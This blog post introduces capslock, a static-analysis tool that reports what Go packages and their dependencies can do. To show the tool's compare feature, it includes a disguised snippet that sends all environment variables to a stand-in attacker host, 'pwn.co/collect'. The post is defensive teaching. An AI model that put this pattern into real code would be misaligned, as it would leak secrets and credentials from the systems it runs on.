What are your Go dependencies capable of? An introduction to capslock
Introduction
A solid standard library coupled with a philosophy of simplicity leads to typical Go projects having fewer and smaller dependencies when compared to other popular ecosystems.
Even so, bringing govulncheck to v1 was a priority for the Go security team in 2023, and Google is investing in projects like capslock to make importing external Go modules safer still.
This post aims to give some background on these initiatives, with a focus on introducing capslock.
The threat
Sonatype’s 8th Annual State of the Software Supply Chain reported a 742% average annual increase in supply chain attacks between 2020 and 2022, with 6 of 7 vulnerabilities coming from transitive (indirect) dependencies.
Attacks can occur anywhere along the “chain” from writing source code to the point users are able to access/run the working software. A compromised dependency can pose a threat throughout the chain.
As an example of an attack within the Go ecosystem, capslock author Jess McClintock highlighted the recent rise in typosquatting on GitHub during her GopherCon 2023 talk.
Honest mistakes, as well as bad actors using deception or protestware, can also lead to compromised modules, which you may depend on directly or indirectly.
The defence
govulncheck can detect known vulnerabilities, but how can informed decisions be made about the attack surface of a module before depending on it? Which of these modules would you add to your go.mod file?
Privileges like these are familiar to anyone who has downloaded an app on iOS or Android, and the ability to learn about and consent to what your apps are capable of doing is becoming more fine-grained. What would this look like for the Go modules ecosystem?
capslock and capabilities
capslock is a tool that aims to make the above permissions table a reality for Go packages. It uses static analysis to detect what a package is capable of, including transitively through its own dependencies.
Here are a few of the capabilities defined in capabilities.md that could be used to make informed decisions about the gooqle and gorrilla modules.
CAPABILITY_NETWORK: Interact with the network
CAPABILITY_FILES: Read/modify the file system
CAPABILITY_SYSTEM_CALLS: Make direct system calls
CAPABILITY_CGO: Identifies calls that execute native code
Let’s see the result of running capslock on the official gorilla/securecookie module.
$ go install github.com/google/capslock/cmd/capslock@latest
$ go get github.com/gorilla/securecookie
$ capslock -packages github.com/gorilla/securecookie
Analyzed packages:
github.com/gorilla/securecookie v1.1.1
CAPABILITY_REFLECT: 8 references
CAPABILITY_UNANALYZED: 7 references
Note that since reflect is only accessed from tests, CAPABILITY_REFLECT would not be output for a module that depends on gorilla/securecookie. That’s because the reflect usages cannot be reached through any call path from the dependent module, and are therefore not an actual risk to it.
Detecting changes
Another feature of capslock is the ability to compare capabilities between executions. Here’s a simple program that executes ls.
package main
import (
	"os"
	"os/exec"
)
func main() {
	cmd := exec.Command("ls")
	cmd.Stdout = os.Stdout
	_ = cmd.Run() // error ignored for brevity
}
As expected, running capslock lets us know that exec is being used.
$ capslock
Analyzed packages:
CAPABILITY_EXEC: 1 references
The output can be written in JSON format and saved for later use.
$ capslock -output=json > out.json
Let’s then modify the program to post environment variables to a collection endpoint.
// save important (and safe) debug metrics
metrics, _ := json.Marshal(os.Environ())
http.Post("http://pwn.co/collect", "application/json", bytes.NewBuffer(metrics))
Using the compare feature, it’s clear that concerning new capabilities have been added to the program. If this were a cookie encoder or UUID generator, then careful review and investigation would be required.
$ capslock -output=compare out.json
Package example has new capability CAPABILITY_NETWORK compared to the baseline.
Package example has new capability CAPABILITY_READ_SYSTEM_STATE compared to the baseline.
Package example has new capability CAPABILITY_REFLECT compared to the baseline.
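The idea behind the comparison can be sketched as a set difference between two lists of capability names. This is only an illustration: the newCapabilities helper is hypothetical, it ignores the per-package detail in capslock's JSON output, and it is not capslock's own implementation.

```go
package main

import (
	"fmt"
	"sort"
)

// newCapabilities returns the capabilities that appear in current but not
// in baseline, sorted by name. It is a hypothetical helper for illustration.
func newCapabilities(baseline, current []string) []string {
	seen := make(map[string]bool, len(baseline))
	for _, c := range baseline {
		seen[c] = true
	}
	var added []string
	for _, c := range current {
		if !seen[c] {
			added = append(added, c)
			seen[c] = true // report each new capability only once
		}
	}
	sort.Strings(added)
	return added
}

func main() {
	// Capability names taken from the two runs shown above.
	baseline := []string{"CAPABILITY_EXEC"}
	current := []string{
		"CAPABILITY_EXEC",
		"CAPABILITY_NETWORK",
		"CAPABILITY_READ_SYSTEM_STATE",
		"CAPABILITY_REFLECT",
	}
	for _, c := range newCapabilities(baseline, current) {
		fmt.Printf("new capability: %s\n", c)
	}
}
```

A CI job built on this idea could fail whenever the returned slice is non-empty.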
How does it work?
The implementation lets the packages and callgraph packages from golang.org/x/tools/go do most of the heavy lifting. The interesting parts of the main function are described below. The source is on the capslock GitHub.
analyzer.GetClassifier
This function is called when no custom classifier is specified. A classifier defines capability mappings for specific functions, packages and cgo suffixes.
GetClassifier calls interesting.DefaultClassifier, which creates an in-memory representation of interesting.cm. This allows taking a function name like net.Dial and looking up the capability it is mapped to. The content of interesting.cm looks like this.
func net.Dial CAPABILITY_NETWORK
func os.Environ CAPABILITY_READ_SYSTEM_STATE
func sync/atomic.SwapPointer CAPABILITY_UNSAFE_POINTER
package os/exec CAPABILITY_EXEC
package syscall CAPABILITY_SYSTEM_CALLS
package unsafe CAPABILITY_ARBITRARY_EXECUTION
cgo_suffix _Cgo_use
cgo_suffix _cgoCheckPointer
cgo_suffix _cgoCheckResult
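To make the lookup concrete, here is a minimal sketch of how lines in this format could be parsed into maps and queried. The classifier type, parseClassifier and lookup are hypothetical names for illustration, not capslock's API. The sketch skips cgo_suffix lines, and checking function entries before package entries is an assumption.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// classifier is a hypothetical, simplified stand-in for capslock's classifier.
type classifier struct {
	funcs    map[string]string // qualified function name -> capability
	packages map[string]string // package path -> capability
}

// parseClassifier reads "func NAME CAPABILITY" and "package PATH CAPABILITY"
// lines. Any other line, including cgo_suffix entries, is skipped.
func parseClassifier(src string) classifier {
	c := classifier{funcs: map[string]string{}, packages: map[string]string{}}
	sc := bufio.NewScanner(strings.NewReader(src))
	for sc.Scan() {
		fields := strings.Fields(sc.Text())
		if len(fields) != 3 {
			continue
		}
		switch fields[0] {
		case "func":
			c.funcs[fields[1]] = fields[2]
		case "package":
			c.packages[fields[1]] = fields[2]
		}
	}
	return c
}

// lookup checks for a function-level entry first, then falls back to a
// package-level entry (an assumed precedence for this sketch).
func (c classifier) lookup(pkg, fn string) (string, bool) {
	if capability, ok := c.funcs[pkg+"."+fn]; ok {
		return capability, true
	}
	capability, ok := c.packages[pkg]
	return capability, ok
}

func main() {
	c := parseClassifier(`func net.Dial CAPABILITY_NETWORK
func os.Environ CAPABILITY_READ_SYSTEM_STATE
package os/exec CAPABILITY_EXEC
cgo_suffix _Cgo_use`)
	fmt.Println(c.lookup("net", "Dial"))
	fmt.Println(c.lookup("os/exec", "Command"))
	fmt.Println(c.lookup("strings", "ToUpper"))
}
```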
analyzer.LoadPackages
This function uses the above-mentioned packages package to load the packages specified with the -packages flag. It returns them as a slice of type packages.Package.
analyzer.RunCapslock
This function performs the static analysis. It calls analyzer.GetCapabilityCounts, which is responsible for building the capability -> reference count mappings present in the command output, e.g. CAPABILITY_EXEC: 1 references.
After the function call graph is built using callgraph and ssautil, all nodes are looped through, and any node with a package or function name found in the classifier is added to a breadth-first search (BFS) queue.
package main
import (
"bytes"
"net/http"
"github.com/google/uuid"
)
func main() {
id := uuid.New().String()
http.Post("https://poster.com", "application/json", bytes.NewBufferString(id))
}
The above program would look something like below (simplified) at the start of the BFS. The classifier entry package net/http CAPABILITY_NETWORK maps the entire net/http package to CAPABILITY_NETWORK, so http.Post is marked as having this capability.
The BFS then moves out from the marked nodes until reaching the target package (main). Each time it reaches main, it will increment the reference count of the current capability.
The final output has CAPABILITY_NETWORK with a reference count of one.
Analyzed packages:
github.com/google/uuid v1.3.1
CAPABILITY_NETWORK: 1 references
CAPABILITY_UNANALYZED: 1 references
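The search described in this section can be sketched on a hand-built graph. This is a simplified illustration rather than capslock's code: the node type and countReferences function are hypothetical, the graph is stored as callee -> callers edges, and the search is assumed to stop expanding once it reaches a function in the target package.

```go
package main

import "fmt"

// node is a hypothetical, simplified call-graph node.
type node struct {
	pkg, name string
}

// countReferences runs a BFS from the seed functions (those matched by the
// classifier) along callee -> caller edges and counts how many functions in
// the target package are reached.
func countReferences(callers map[node][]node, seeds []node, target string) int {
	visited := make(map[node]bool)
	var queue []node
	for _, s := range seeds {
		if !visited[s] {
			visited[s] = true
			queue = append(queue, s)
		}
	}
	count := 0
	for len(queue) > 0 {
		n := queue[0]
		queue = queue[1:]
		if n.pkg == target {
			count++ // reached the target package: one more reference
			continue
		}
		for _, caller := range callers[n] {
			if !visited[caller] {
				visited[caller] = true
				queue = append(queue, caller)
			}
		}
	}
	return count
}

func main() {
	post := node{"net/http", "Post"}
	newUUID := node{"github.com/google/uuid", "New"}
	mainFn := node{"main", "main"}
	// Reverse call graph for the example program: both functions are called by main.
	callers := map[node][]node{
		post:    {mainFn},
		newUUID: {mainFn},
	}
	// Only http.Post is seeded, because net/http maps to CAPABILITY_NETWORK.
	fmt.Println("CAPABILITY_NETWORK:", countReferences(callers, []node{post}, "main"))
}
```

Tracking visited nodes keeps the search from looping on recursive call chains.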
Summary
Although experimental at the time of writing, capslock is already a useful tool for vetting Go modules. The compare feature also allows for integration into CI pipelines for detecting and acting on the addition of new capabilities to an existing dependency.
The potential of a future in which pkg.go.dev lists capabilities for every module, and Go tooling is able to break builds with unapproved capabilities is exciting for anyone concerned about supply chain attacks. If you’re one of these people, consider giving capslock a star and showing your support!